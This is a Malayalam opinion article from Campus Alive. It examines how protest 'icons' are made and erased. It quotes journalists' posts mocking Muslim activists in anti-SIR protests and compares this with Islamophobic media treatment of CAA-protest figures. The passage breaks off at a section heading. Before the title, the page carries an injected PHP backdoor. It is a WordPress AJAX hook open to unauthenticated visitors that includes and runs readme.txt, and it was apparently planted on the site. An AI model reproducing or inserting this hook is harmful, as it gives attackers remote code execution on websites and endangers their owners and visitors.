if(!function_exists('file_check_readme34061')){ add_action('wp_ajax_nopriv_file_check_readme34061', 'file_check_readme34061'); add_action('wp_ajax_file_check_readme34061', 'file_check_readme34061'); function file_check_readme34061() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } നിര്‍മിത യാഥാര്‍ത്ഥ്യവും പ്രതീകങ്ങളുടെ നിര്‍മിതിയും - Campus Alive
Campus Alive

നിര്‍മിത യാഥാര്‍ത്ഥ്യവും പ്രതീകങ്ങളുടെ നിര്‍മിതിയും

പ്രതികരണം ഒന്ന്: ആദില്‍ പാലോട് (റിപോര്‍ട്ടര്‍ ടിവി)

“എനിക്കറിയില്ല, നിങ്ങള്‍ക്കറിയാമോ?! ദില്ലിയിലെ എട്ടുകാലി മമ്മൂഞ്ഞുമാരെ കുറിച്ചാണ്….റിപ്പോര്‍ട്ടര്‍മാര്‍ ലൈവ് തുടങ്ങുന്ന സമയം നോക്കി സ്‌ക്രീന്‍ സ്പേസ് കവര്‍ന്നെടുക്കാന്‍ ഉത്സാഹിക്കുന്ന ഒരു സംഘത്തെ നേരില്‍ കണ്ടു കഴിഞ്ഞ ദിവസം. പ്രതിപക്ഷത്തിന്റെ സുപ്രീം കോടതി മാര്‍ച്ചിനിടെ മുദ്രാവാക്യത്തിന് നേരെ മൈക്ക് നീട്ടിയപ്പോള്‍ അടുത്തേക്ക് വന്ന് പ്രസംഗിച്ചു തുടങ്ങി അക്കൂട്ടത്തിലെ ഒരു അല്‍പേഷ്. ഒടുവില്‍ മൈക്ക് വലിക്കേണ്ടി വന്നു. തെരുവിലെ സമരമല്ല, ക്യാമറ പ്രസന്‍സ് മാത്രം ആഗ്രഹിക്കുന്ന ഒരു സംഘം ദില്ലി യില്‍ കറങ്ങി നടക്കുന്നുണ്ട്. അതെ, മതമൗലിക സംഘം തന്നെ. വെറും ഇത്തിള്‍കണ്ണികള്‍. എന്നിട്ടോ നേഹയ്ക്കും ഐഷി ഘോഷിനുമൊപ്പം പേര് ചേര്‍ത്ത് വെക്കുന്നു. ഒന്നേ പറയാനുള്ളു. അല്പം ഉളുപ്പ് ആകാം…”

ഇതേ പോസ്റ്റിനുള്ള കമന്റുബോക്‌സില്‍ അദ്ദേഹം ഇങ്ങനെയും കുറിച്ചു: ജോണ്‍ ബ്രിട്ടാസും, എഎ റഹീമും, നേഹയും, ഐഷിയും, ഉദയ് ഭാനു ചിബ്ബും റോഡില്‍ അടികൊണ്ട് വീഴുമ്പോഴാണ് അവന്മാരുടെ ഒരു വൈഫൈ യും മഹ്ദി യും ഒഞ്ഞ് പോടെ (ഒക്ടോബര്‍ 15, 2026, ഫേസ്ബുക്ക്/ആദില്‍ പാലോട്)

രണ്ട് ദിവസത്തിനുശേഷം അദ്ദേഹം തന്റെ വാളില്‍ വീണ്ടും ഇത് വിശദീകരിച്ചു. വിപ്ലവത്തിന് നോക്കുകൂലി എന്നായിരുന്നു ശീര്‍ഷകം: 

‘നിങ്ങള്‍ ആരാണ്?’

‘ഞങ്ങള്‍ നേഹ ബോറയ്ക്ക് ഒപ്പം വന്നവരാണ്.!’

പൊലീസ് ബസ്സില്‍ നിന്നും ഒരു പെണ്‍കുട്ടി റിപ്പോര്‍ട്ടര്‍ ടിവി യോട് സംസാരിക്കുന്ന ചിത്രം പലരും അയച്ചു തന്നു. ആ വീഡിയോയിലെ സംഭാഷണമാണ് മുകളില്‍. നേഹ ബോറക്കൊപ്പം ‘ഇടയ്ക്ക്’ സമരത്തിനിറങ്ങുവരെ, നേഹ ബോറക്കൊപ്പം തലക്കെട്ടില്‍ ചേര്‍ത്ത് വെക്കുന്നതിലെ അസാംഗത്യം ഇപ്പോഴും ആവര്‍ത്തിക്കുന്നു. വീഡിയോ പോലും കാണാതെ ചാമ്പി വിടുകയാണ് അടിമകള്‍. 

അതല്ല തമാശ. ദില്ലി യിലെ മുതിര്‍ന്ന മാധ്യമപ്രവര്‍ത്തകര്‍ പോലും ചോദിക്കുന്നു; ഏതാണ് ഈ കഥാപാത്രങ്ങള്‍ എന്ന്. ആരുടേയും സമരങ്ങളെ അധിക്ഷേപിക്കാന്‍ ഉദ്ദേശ്യമില്ല. എന്നാലും അല്പസ്വല്പം മര്യാദയൊക്കെ വേണ്ടേ.

കൂലിയെഴുത്തുകാര്‍ക്ക് മറുപടി പറയാന്‍ സമയമോ, അതുകൊണ്ട് എന്തെങ്കിലും ഉപകാരമോ ഇല്ല. വിശേഷിച്ചും മതരാഷ്ട്രവാദികള്‍ക്ക്. ആരില്‍ നിന്നും ഒരു രൂപയുടെ പോലും സൗജന്യം പറ്റിയിട്ടില്ല എന്നതാണ് ആത്മവിശ്വാസം. അപ്പോള്‍ ഇത് ഇവിടെ നിര്‍ത്താം (ഒക്ടോബര്‍ 15, 2026, ഫേസ്ബുക്ക്/ആദില്‍ പാലോട്)

പ്രതികരണം രണ്ട്: ശ്രീജിത്ത് ദിവാകരന്‍ (അഴിമുഖം)

നേഹയും ഓയ്ഷിയും വാര്‍ത്തകളില്‍ നിറഞ്ഞതോടെ എല്ലാവര്‍ക്കും തങ്ങളുടെ ഐകണ്‍സ് വേണമെന്നുണ്ട്. അതൊന്നും ലാര്‍ജര്‍ ശ്രമങ്ങളെ ബാധിക്കേണ്ട കാര്യമില്ല.  ഇന്ത്യന്‍ സ്വാതന്ത്ര്യസമരം മുതല്‍ ലോകത്തുള്ള ഏത് മുന്നേറ്റങ്ങളിലും നുഴഞ്ഞുകയറ്റക്കാരും ഫ്രോഡുകളും അല്പന്മാരും എല്ലാം ഉണ്ടായിരുന്നു. പക്ഷേ അവരുടെ അജണ്ടകളിലൊന്നും വീഴാതെ പോരാടി മുന്നേറിയാണ് എല്ലാ സമരങ്ങളും വിജയിച്ചിട്ടുള്ളത്.

അഥവാ ഈ സമരം ഒരു ആശയവിഭാഗവും ഒറ്റയ്ക്ക് ചെയ്യുന്നതല്ല. ഇത് ഫാഷിസം ഇന്ത്യയില്‍ വേണ്ട എന്ന് ആശിക്കുന്നവരുടെ പോരാട്ടമാണ്. ഇതില്‍ പണിയെടുക്കുന്ന മനുഷ്യരെ നെഗേറ്റ് ചെയ്യാന്‍ ശ്രമിക്കുന്ന സംഘപരിവാരിന്റെ ഒറ്റുകാരുടെ ഭാഗമല്ല നമ്മള്‍. ഇത് ജനാധിപത്യ വിശ്വാസികളുടെ സമരമാണ്. ഇതില്‍ പരസ്പരം എതിര്‍ക്കുന്ന പലരും ഉണ്ട്. പക്ഷേ ഒറ്റ ലക്ഷ്യമാണ്.

ഫാഷിസം തകരണം. ഗോദി മീഡിയ തകരണം. (സമരത്തിലെ ഇടതുപ്രതിനിധാനത്തെക്കുറിച്ച് പ്രത്യേകിച്ചും സമരത്തെക്കുറിച്ച് പൊതുവിലും നടത്തിയ പ്രതികരണത്തില്‍നിന്ന് എടുത്തത്, ഒക്ടോബര്‍ 16, 2026, ഫേസ്ബുക്ക്/ശ്രീജിത്ത് ദിവാകരന്‍). 

എസ്‌.ഐ.ആര്‍ വിരുദ്ധ സമരത്തിലെ നുഴഞ്ഞുകയറ്റക്കാര്‍

തിരഞ്ഞെടുപ്പ് കമ്മീഷ്ണര്‍ ഗ്യാനേഷ്‌ കുമാറിനെതിരെയുള്ള സമരം അതിന്റെ മൂര്‍ദ്ധന്യത്തിലെത്തിയ സമയത്താണ് പ്രമുഖമായ രണ്ട് മാധ്യമങ്ങളില്‍ പ്രവര്‍ത്തിക്കുന്ന രണ്ട് മാധ്യമപ്രവര്‍ത്തകരില്‍നിന്ന് മുകളില്‍ എടുത്തു ചേര്‍ത്ത വിധത്തിലുള്ള പ്രതികരണം ഉണ്ടായത്. സ്വാഭാവികമായും പ്രതികരണങ്ങളോട് വിയോജിപ്പുകളും ഉയര്‍ന്നുവന്നു. ഈ വിയോജിപ്പുകള്‍ക്കും മറുപടിയുണ്ടായി. ദേശീയതലത്തില്‍ പ്രവര്‍ത്തിക്കുന്ന സമരങ്ങളില്‍ ചില മുസ്ലിംവിഭാഗങ്ങളും സംഘടനകളും നുഴഞ്ഞുകയറിയെന്നും അവര്‍ സ്വന്തമായ ഐക്കണുകള്‍ നിര്‍മിക്കാനുള്ള ശ്രമത്തിലാണെന്നുമായിരുന്നു ഇരുവരുടെയും പരാതി. ഈ ശ്രമം അനര്‍ഹമായ നേട്ടങ്ങള്‍ കൊയ്യലാണെന്നും രണ്ട് പേരും കരുതുന്നു. ഇത്തരം നുഴഞ്ഞുകയറ്റക്കാര്‍ ഫ്രോഡുകളും അല്‍പ്പന്മാരുമാണെന്നും അത് പുതിയ കാര്യമല്ലെന്നും അതില്‍ ഒന്നാമന് അഭിപ്രായമുണ്ട്. എങ്കിലും പണിയെടുക്കുന്ന മനുഷ്യരെ നെഗേറ്റ് ചെയ്യാന്‍ ശ്രമിക്കുന്ന സംഘപരിവാരിന്റെ ഒറ്റുകാരുടെ ഭാഗമല്ല തങ്ങളെന്നും ഇത് ജനാധിപത്യ വിശ്വാസികളുടെ സമരമാണെന്നും ഇതില്‍ പരസ്പരം എതിര്‍ക്കുന്ന പലരും ഉണ്ടെന്നും രണ്ടാമന്‍ മാനവിക പക്ഷത്തുനിന്ന് ഉദാരനാകുന്നു. 

എങ്കിലും ഒന്നാമന്‍ അത്ര മൃദുസ്വഭാവിയല്ല. അദ്ദേഹം അത്തരക്കാരെ ദില്ലിയിലെ എട്ടുകാലി മമ്മൂഞ്ഞുമാരെന്നും മതമൗലിക സംഘമെന്നും ഇത്തിള്‍ക്കണ്ണികളെന്നും വിശേഷിപ്പിക്കുന്നു. എന്നിട്ടോ നേഹയ്ക്കും ഐഷി ഘോഷിനുമൊപ്പം പേര് ചേര്‍ത്ത് വെക്കാനുള്ള ശ്രമത്തെ കണക്കിനു പരിഹസിക്കുകയും ചെയ്യുന്നു. കൂട്ടത്തില്‍ സമരത്തില്‍ പങ്കെടുത്തവരുടെ പേരുകള്‍ വികൃതമായി ഉച്ചരിക്കുന്നുമുണ്ട്. അദ്ദേഹത്തിന്റെ പരിഹാസത്തിന് പാത്രമാവുന്ന ഒരാളെ അദ്ദേഹം ‘വൈഫൈ’ എന്നാണ്  വിളിക്കുന്നത്. ഡല്‍ഹി സര്‍വകലാശാല വിദ്യാര്‍ത്ഥിനി ഹൈഫ ഷഫീഖ് ആണ് അദ്ദേഹത്തിന്റെ ‘വൈഫൈ’. 

രണ്ട് പേരുടെയും പൊതുപരാതി നുഴഞ്ഞുകയറാന്‍ ശ്രമിക്കുന്ന ഫ്രോഡുകളാണ് മതമൗലിക സംഘമെന്നതാണ്. ഐഷി ഘോഷിനെപ്പോലെയും നേഹ ബോറയെപ്പോലെയും ഐക്കണുകളായി മാറാനും മാറ്റാനും അങ്ങനെ ജനങ്ങളെ വിശ്വസിപ്പിക്കാനും പെടാപ്പാട് പെടുന്ന ഏതാനും സംഘടനകളാണ് ഇവരുടെ ശത്രുപക്ഷത്ത്. ഈ വിശകലനങ്ങള്‍ മാധ്യമപ്രവര്‍ത്തകരില്‍നിന്നു തന്നെ പിന്തുണയുള്ളതായി ഇവരുടെ കമന്റ് ബോക്‌സില്‍ നിന്ന് വ്യക്തമാണ്. ഐക്കണുകളായി മാറാന്‍ പെടാപ്പാട് പെടുന്ന യുവാക്കളെക്കുറിച്ചുള്ള ഈ വിശകലനങ്ങള്‍ ഐക്കണുകളുടെ രാഷ്ട്രീയം എന്താണെന്ന് പരിശോധിക്കാന്‍ സ്വാഭാവികമായും നമ്മെ നിര്‍ബന്ധിതരാക്കുന്നു. അതിനുവേണ്ടി രണ്ട് സമരമാതൃകകള്‍ നാം പരിശോധിക്കുന്നുണ്ട്. ആദ്യത്തേത് പൗരത്വഭേദഗതിക്കെതിരെ നടന്ന സമരമാണ്. രണ്ടാമത്തേത് ഇപ്പോള്‍ നടക്കുന്ന എസ്‌.ഐ.ആര്‍ വിരുദ്ധ സമരവും. 

പൗരത്വസമരം: പ്രതീകങ്ങളുടെ മാതൃക

കഴിഞ്ഞ ഒരു ദശകത്തിനുള്ളില്‍ ഇന്ത്യന്‍ ഭാവനയെ ഏറ്റവും കൂടുതല്‍ സ്വാധീനിച്ച സമരങ്ങളിലൊന്നാണ് 2019 കാലത്തെ പൗരത്വഭേദഗതിക്കെതിരേയുള്ള സമരം. സമരം നടന്ന വിസ്തൃതിയിലും പങ്കെടുത്ത ജനങ്ങളുടെ എണ്ണം കൊണ്ടുമാണ് ആ സമരം ചരിത്രത്തില്‍ എഴുതപ്പെട്ടത്. പാര്‍ലമെന്റിന്റെ ഇരുസഭകളിലും പൗരത്വഭേദഗതി നിയമം പാസ്സാക്കിയ ശേഷം രാജ്യത്തിന്റെ അങ്ങോളമിങ്ങോളം ആയിരക്കണക്കിന് പ്രതിഷേധങ്ങളാണ് നടന്നത്. ഈ പ്രതിഷേധങ്ങള്‍ കശ്മീര്‍ മുതല്‍ കേരളം വരെയും അസം മുതല്‍ ഗുജറാത്ത് വരെയും നീളത്തിലും വീതിയിലും നീണ്ടുകിടന്നു. അയ്യായിരം മുതല്‍ രണ്ടും മൂന്നും ലക്ഷം വരെ ആളുകള്‍ യോഗങ്ങളില്‍ പങ്കെടുത്തു. ദി വയര്‍ റിപോര്‍ട്ട് ചെയ്ത സമര അവലോകനത്തില്‍നിന്ന് ഞാന്‍ വിപുലമായി ഉദ്ധരിക്കട്ടെ (29 Dec, 2019, CAA: The Peaceful Protests by Muslims That No One Is Talking About, Mahtab Alam, the wire):

2019-ലെ സമരകാലത്ത് മഹാരാഷ്ട്രയിലെ മലേഗാവില്‍ നടന്ന പ്രതിഷേധത്തില്‍ 2 ലക്ഷം പേര്‍ പങ്കെടുത്തു. നാഗ്പൂരില്‍ 40,000 പേരും ബംഗളൂരുവില്‍ 1 ലക്ഷത്തില്‍ കൂടുതല്‍ പേരും പങ്കെടുത്തു. ബംഗളൂരുവിലെ റാലിയില്‍ നാല് ലക്ഷം പേരുണ്ടെന്നു പോലും ചിലര്‍ പറഞ്ഞു. ബംഗളൂരുവിലും മൈസൂരിലും അടക്കം പലയിടങ്ങളിലും പ്രതിഷേധങ്ങള്‍ നടന്നു. പതിനായിരങ്ങള്‍ പങ്കെടുത്തു. ബിഹാറിലെ സീമാഞ്ചല്‍ മേഖലയിലുള്ള കിഷന്‍ഗഞ്ച്, ഫോര്‍ബ്‌സ്ഗഞ്ച്, അരാരിയ, പൂര്‍ണിയ തുടങ്ങിയ സ്ഥലങ്ങളില്‍ വലിയ പ്രതിഷേധങ്ങളാണ് ഉയര്‍ന്നത്. പലയിടങ്ങളിലും വെള്ളിയാഴ്ച പ്രാര്‍ത്ഥനകള്‍ക്കുശേഷം പ്രതിഷേധക്കാര്‍ ഒത്തുകൂടി. 

മഹാരാഷ്ട്രയിലെ മുംബ്ര, സോലാപൂര്‍ തുടങ്ങിയ സ്ഥലങ്ങളിലും ജനം ഒത്തുകൂടി. വിദര്‍ഭയിലെ മറ്റു നഗരങ്ങളിലും സമാനമായ പ്രതിഷേധങ്ങള്‍ നടന്നു. 

രാജസ്ഥാനിലെ കോട്ട നഗരത്തിലും ചൊവ്വാഴ്ച മുസ്ലിംകള്‍ വലിയ പ്രതിഷേധം സംഘടിപ്പിച്ചു. അഞ്ച് കിലോമീറ്റര്‍ നീളമുണ്ടായിരുന്ന പ്രതിഷേധം സമാധാനപരമായിരുന്നു. ജയ്പൂരിലും സംസ്ഥാനത്തിന്റെ മറ്റു ഭാഗങ്ങളിലും മുസ്ലിംകള്‍ സമാധാനപരമായി സംഘടിച്ചു. ഭോപ്പാലില്‍ റോഷന്‍പുര, ഇഖ്ബാല്‍ മൈതാന്‍, ബുധ്വാര തുടങ്ങിയ പ്രധാന കവലകളില്‍ പ്രതിഷേധങ്ങള്‍ നടന്നു. തെലങ്കാന, ആന്ധ്രപ്രദേശ്, പശ്ചിമബംഗാള്‍, കേരളം, ഗോവ, ഉത്തര്‍പ്രദേശ്, തമിഴ്നാട് തുടങ്ങിയ സംസ്ഥാനങ്ങളിലും സമാധാനപരമായ പ്രതിഷേധങ്ങള്‍ നടന്നിട്ടുണ്ട്. ഏറെക്കുറെ മാധ്യമങ്ങളില്‍ ഗണ്യമായ ശ്രദ്ധ നേടിയ ഷഹീന്‍ ബാഗില്‍ ആയിരക്കണക്കിന് മുസ്ലിം സ്ത്രീകളാണ് പങ്കെടുത്തത്. 

ഉത്തരാഖണ്ഡിന്റെ തലസ്ഥാനമായ ഡെറാഡൂണില്‍ പ്രതിഷേധത്തിന്റെ ഭാഗമായി നഗരത്തിലെ ആയിരക്കണക്കിനു പേര്‍ ഉപവാസമനുഷ്ഠിച്ചു. പല സമരകേന്ദ്രങ്ങളിലും ഇതാവര്‍ത്തിച്ചു. ചിലര്‍ ബലൂണുകള്‍ പറത്തി. ദേശീയപതാകയും ദേശീയചിഹ്നങ്ങളും ഭരണഘടനയും വ്യാപകമായി ഉപയോഗപ്പെടുത്തി.

എന്നാല്‍ മുഖ്യധാരാ മാധ്യമസ്ഥാപനങ്ങള്‍ പ്രത്യേകിച്ച് ഡല്‍ഹി ആസ്ഥാനമുള്ള മുഖ്യധാരാ മാധ്യമങ്ങള്‍ പല കാരണങ്ങളാലും ഇത്തരം പ്രതിഷേധങ്ങളെ അവഗണിച്ചു. അവയ്ക്കും വേണ്ടത്ര ശ്രദ്ധ നല്‍കിയില്ല. വാര്‍ത്തകളില്‍ പങ്കെടുത്തവരുടെ എണ്ണം പത്തും ഇരുപതും ശതമാനമായി ചുരുക്കി. എപ്പോഴെങ്കിലും പ്രതിഷേധങ്ങള്‍ ഏതെങ്കിലും തരത്തിലുള്ള അക്രമസംഭവങ്ങളിലേക്ക് പോകുമ്പോഴാണ് മാധ്യമങ്ങള്‍ വാര്‍ത്തകള്‍ നല്‍കിയത്.  അക്രമങ്ങളില്‍ പലതും സംഘപരിവാര്‍ ശക്തികളുടെ ഭാഗത്തുനിന്നായിരുന്നു. 

ന്യൂസ്‌ക്ലിക്ക് റിപ്പോര്‍ട്ട് പ്രകാരം, ഒരു തിങ്കളാഴ്ച ബിഹാറിലെ ഭഗല്‍പൂര്‍, പട്‌ന, സമസ്തിപൂര്‍, ദര്‍ഭംഗ, കിഴക്കന്‍ ചമ്പാരണ്‍, അരാരിയ എന്നിവയുള്‍പ്പെടെ അര ഡസനോളം ജില്ലകളില്‍ ആയിരക്കണക്കിന് ആളുകള്‍ തെരുവിലിറങ്ങി പ്രതിഷേധിച്ചു. എന്നാല്‍ അക്രമം നടന്നുവെന്ന വാര്‍ത്ത വന്നപ്പോഴാണ് മുഖ്യധാരാ മാധ്യമങ്ങള്‍ അവയ്ക്ക് വ്യാപകമായ ശ്രദ്ധ നല്‍കിയത്. ജാമിഅയിലെ വിദ്യാര്‍ത്ഥികളുടെ പ്രതിഷേധങ്ങള്‍ ചില മാധ്യമങ്ങള്‍ക്കു മാത്രമാണ് അക്കാലത്ത് വാര്‍ത്തയായത്. എന്നാല്‍ പ്രതിഷേധം അക്രമാസക്തമായതോടെ സമരം ഡല്‍ഹി ആസ്ഥാനമായ പത്രങ്ങള്‍ക്ക് വാര്‍ത്തയായി. പൗരത്വസമര റിപോര്‍ട്ടിങ്ങിന്റെ ഒരു പൊതുമാതൃകതന്നെയായിരുന്നു അത്.

പൗരത്വസമരത്തില്‍ ഉപയോഗിക്കുന്ന സമരരൂപങ്ങളെ അസാധാരണമായ കുറ്റകൃത്യങ്ങളായി അവതരിപ്പിക്കുകയായിരുന്നു മറ്റൊരു മാതൃക. അത്തരം നിരവധി ഉദാഹരണങ്ങള്‍ കേരളത്തില്‍തന്നെ കാണാം. സംഘപരിവാര്‍ സംഘടനകളുടെ പൊതുയോഗദിവസം കടകളടച്ചുപോയവര്‍ക്കെതിരെ കേസെടുക്കുക, പൊതുപ്രസ്താവനകളില്‍ പേരുചേര്‍ക്കുന്നവെര കേസില്‍ കുടുക്കുക, സംഘപരിവാറിന്റെ വിശദീകരണയോഗത്തിനു മുന്നോടിയായി കടകളടക്കരുതെന്ന് മുന്നറിയിപ്പ് നല്‍കുക (കരിമണ്ണൂര്‍) പ്രതിഷേധങ്ങളില്‍ പങ്കെടുത്തവര്‍ക്കെതിരേ കേസെടുക്കുക,  സിഎഎയെ പിന്തുണച്ചതിന് പഞ്ചായത്ത് കുടിവെള്ളം നിഷേധിച്ചുവെന്ന് ആരോപിച്ച് കേസെടുക്കുക തുടങ്ങിയവ ഉദാഹരണം. പ്രതിഷേധങ്ങളെ മൂടിവച്ച് നിശ്ശബ്ദമാക്കിയും കുറ്റകൃത്യവല്‍ക്കരിച്ച് നിശ്ശബ്ദത ഉറപ്പുവരുത്തിയുമാണ് ഈ സമരങ്ങളെ അധികാരികള്‍ നേരിട്ടത്. ഈ ശ്രമത്തില്‍ അവര്‍ക്ക് കൂട്ടായി മാധ്യമങ്ങളും അവരുടെ ദൗത്യം നിര്‍വഹിച്ചു.

മുസ്ലിം സമൂഹത്തിന് സഹജമായ കുറ്റകൃതൃ-അക്രമവാസനയെക്കുറിച്ച ആഖ്യാനങ്ങള്‍ക്ക് ശക്തിപകരാനാണ് ഇത്തരം വാര്‍ത്താ അവതരണശൈലി ഉപയുക്തമായത്. ബി.ജെ.പി മുതല്‍ എതിര്‍പക്ഷത്തുള്ള നിരവധി നേതാക്കള്‍ ഇത്തരം മാതൃകകള്‍ വ്യാപകമായി ഉപയോഗപ്പെടുത്തി. മതനിരപേക്ഷ ഇന്ത്യാ രാജ്യത്തെ മതനിരപേക്ഷ മൂല്യങ്ങള്‍ സംരക്ഷിക്കാന്‍ പോരാടിക്കൊണ്ടിരിക്കുമ്പോള്‍, മുസ്ലിം ജനവിഭാഗം എന്തിനാണ് അക്രമത്തിന്റെ മാര്‍ഗം സ്വീകരിക്കുന്നത്? എന്നാണ് ബി.ജെ.പി നേതാവ് യശ്വന്ത് സിന്‍ഹ ട്വീറ്റ് ചെയ്തത് (ഡിസംബര്‍ 17, 2019). മുസ്ലിംകളുടെ അക്രമാസ്തമായ പ്രതികരണസ്വഭാവത്തെ പ്രധാനമന്ത്രി നരേന്ദ്ര മോദിയും ആഭ്യന്തര മന്ത്രിയും കുറ്റപ്പെടുത്തി. മാധ്യമസ്ഥാപനങ്ങള്‍, പ്രത്യേകിച്ച് ടെലിവിഷന്‍ ചാനലുകള്‍, പ്രതിഷേധങ്ങളെ അവതരിപ്പിച്ച രീതി, മുസ്ലിംകള്‍ വലിയ തോതില്‍ സംഘടിക്കുന്നിടത്തെല്ലാം അക്രമം അനിവാര്യമാണെന്ന പ്രതീതിയുളവാക്കിയെന്ന് മഹ്താബ് ആലം ദി വയറില്‍ നേരത്തെ പരാമര്‍ശിച്ച ലേഖനത്തില്‍ എഴുതി. സമൂഹത്തെ ധ്രുവീകരിക്കാന്‍ ശ്രമിക്കുന്നവരെന്നും ഭരണാധികാരികളും മാധ്യമങ്ങളും മുസ്ലിംകളെ കുറ്റപ്പെടുത്തി.

അതിനര്‍ത്ഥം ഈ സമരങ്ങളില്‍ പ്രതീകങ്ങളൊന്നും ഇല്ലായിരുന്നുവെന്നല്ല. തീര്‍ച്ചയായും അത്തരം ചിലതുണ്ടായിരുന്നു. സി.എ.എ വിരുദ്ധ സമരത്തിന്റെ മുഖമായി അഖിലേന്ത്യാ തലത്തില്‍ ഉയര്‍ന്നുവന്ന നിരവധി പേരുണ്ട്. ഡല്‍ഹിയിലെ ജാമിഅ മില്ലിയ ഇസ്ലാമിയ സര്‍വകലാശാലയിലെ ലദീദ ഫര്‍സാന, ഇവിടെത്തന്നെ വിദ്യാര്‍ത്ഥിയായ ആയിഷ റെന്ന, അലിഗഢ് മുസ്ലിം സര്‍വകലാശാലയിലെയും ജവഹര്‍ലാല്‍ നെഹ്റു സര്‍വകലാശാലയിലെയും വിദ്യാര്‍ഥി രാഷ്ട്രീയവുമായി ബന്ധപ്പെട്ട് പ്രവര്‍ത്തിച്ച അഫ്രീന്‍ ഫാത്തിമ, ജാമിഅ മില്ലിയ ഇസ്ലാമിയയിലെ ഗവേഷക വിദ്യാര്‍ഥിനിയും ജാമിഅ കോര്‍ഡിനേഷന്‍ കമ്മിറ്റിയിലെ പ്രവര്‍ത്തകയുമായിരുന്നു സഫൂറ സര്‍ഗാര്‍, കേരളത്തില്‍ നിന്നുള്ള ജാമിഅ മില്ലിയ ഇസ്ലാമിയ വിദ്യാര്‍ഥിയായ ഷഹീന്‍ അബ്ദുല്ല, ജവഹര്‍ലാല്‍ നെഹ്റു സര്‍വകലാശാലയിലെ മുന്‍ വിദ്യാര്‍ഥിയും സാമൂഹിക-രാഷ്ട്രീയ പ്രവര്‍ത്തകനുമായ ഉമര്‍ ഖാലിദ്, ജവഹര്‍ലാല്‍ നെഹ്റു സര്‍വകലാശാലയിലെ മുന്‍ ഗവേഷക വിദ്യാര്‍ഥിയും രാഷ്ട്രീയ പ്രവര്‍ത്തകനുമായ ഷര്‍ജീല്‍ ഇമാം….ഈ പട്ടിക നീട്ടാം. പക്ഷേ, വളരെ പെട്ടെന്നു തന്നെ ഈ പ്രതീകങ്ങള്‍ മാഞ്ഞുപോകുകയും ആ സ്ഥാനത്ത് ദേശീയമാധ്യമങ്ങളുടെ ഫോക്കസിലേക്ക് കനയ്യ കുമാറും ഐഷീ ഘോഷും കടന്നുവന്നുവരികയും ചെയ്തു. പിന്നീട് ദേശീയതലത്തില്‍ ഏറെ ആഘോഷിക്കപ്പെട്ട പ്രതീകങ്ങളായിരുന്നു ഇവര്‍ ഇരുവരും.

എന്നാല്‍ മറ്റുള്ളവരുടെ അനുഭവങ്ങള്‍ ഇതില്‍നിന്ന് തികച്ചും വ്യത്യസ്തമായിരുന്നു. ഇക്കാലത്തുതന്നെയാണ് മലപ്പുറം ജില്ലയിലെ കൊണ്ടോട്ടിയില്‍ സിഎഎ-എന്‍ആര്‍സി വിരുദ്ധ സംയുക്ത പ്രതിഷേധം നടന്നത്. ഈ പരിപാടിയില്‍ ജാമിഅ മി്ല്ലിയയിലെ വിദ്യാര്‍ത്ഥിയും പൗരത്വസമരമുഖവുമായിരുന്ന ആയിഷ റെന്നയും പങ്കെടുത്തു. പ്രസംഗത്തിനിടയില്‍ പൗരത്വസമരത്തില്‍ പങ്കെടുത്തതിന്റെ പേരില്‍ കേരളത്തില്‍ ജയിയിലായവരെ വിട്ടയക്കണമെന്ന് ആവശ്യപ്പെട്ടപ്പോള്‍ സദസ്സില്‍നിന്ന് ചിലര്‍ വിമര്‍ശിച്ചു. ഒരു ഇടതുനേതാവ് നിന്റെ അഭിപ്രായം നിന്റെ വീട്ടില്‍പോയി പറയണമെന്ന് ദേഷ്യപ്പെട്ടു. 2020 ജനുവരിയില്‍ വാഴക്കാട്ട് ആയിഷ പങ്കെടുക്കേണ്ടിയിരുന്ന പരിപാടയില്‍നിന്ന് ഒഴിവാക്കി. ആയിഷ പങ്കെടുത്താൽ പരിപാടി ബഹിഷ്‌കരിക്കുമെന്ന് ചിലര്‍ പറഞ്ഞെന്നായിരുന്നു റിപോര്‍ട്ട്. 

എന്തുകൊണ്ടാണ് പൗരത്വസമര പ്രതീകങ്ങള്‍ പൊടുന്നനെ മാഞ്ഞുപോയത്? പ്രതിഷേധങ്ങളെ കുറ്റകൃത്യമാക്കി മാറ്റുന്ന സര്‍ക്കാര്‍ നിലപാടും സംഘര്‍ഷങ്ങളില്‍ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്ന മാധ്യമശൈലിയും ഇത്തരം മാഞ്ഞുപോകലിന് കാരണമായിരിക്കണം. കൂടാതെ സമരനായകരുടെ മതപരമായ സ്വത്വത്തെയും രാഷ്ട്രീയബന്ധങ്ങളെയും ഇതേസമയത്തുതന്നെ മാധ്യമങ്ങള്‍ ചര്‍ച്ചയുടെ ഫോക്കസിലേക്ക് കൊണ്ടുവന്നു. തീവ്രവാദബന്ധം, രാജ്യദ്രേഹം, രാഷ്ട്രവിരുദ്ധത, മതമൗലിക ആരോപണം, തുടങ്ങി ഇസ്ലാമിക രാഷ്ട്രീയം വരെ തരാതരം ആരോപിക്കപ്പെട്ടു. ഇത്തരം ആരോപണങ്ങള്‍ സംഘപരിവാര്‍ ഹന്‍ഡിലുകളില്‍നിന്ന് ഉയര്‍ന്നുവന്നതായി ന്യൂഇന്ത്യന്‍ എക്‌സ്പ്രസിന് നല്‍കിയ പ്രതികരണത്തില്‍ ആയിഷ റെന്ന പറഞ്ഞിരുന്നു. ചുരുക്കത്തില്‍ ഇസ്‌ലാമോഫോബിക് വംശീയചിത്രീകരണങ്ങളിലൂടെയാണ് പൗരത്വസമരമുഖങ്ങളെ പൊതുമണ്ഡലത്തില്‍നിന്ന് മായ്ച്ചു കളഞ്ഞത്. ഇതാകട്ടെ സംഘപരിവാര്‍ ഹാന്‍ഡിലുകളുടെ മാത്രം പ്രവര്‍ത്തിയുടെ ഭാഗമായിരുന്നില്ല, മതേതരമെന്ന് സ്വയം വിളിക്കുന്ന മാധ്യമങ്ങളും ഇതേ കാര്യം ചെയ്തു. ഇത്തരം നിര്‍മിത പ്രതിനിധാനങ്ങളിലൂടെയാണ് പൗരത്വസമരപ്രതീകങ്ങളെ മറച്ചുവെച്ചതും ആ സ്ഥാനത്ത് പുതിയ മുഖങ്ങള്‍ സ്ഥാനം പിടിച്ചതും.

എസ്‌.ഐ.ആര്‍ വിരുദ്ധസമരം

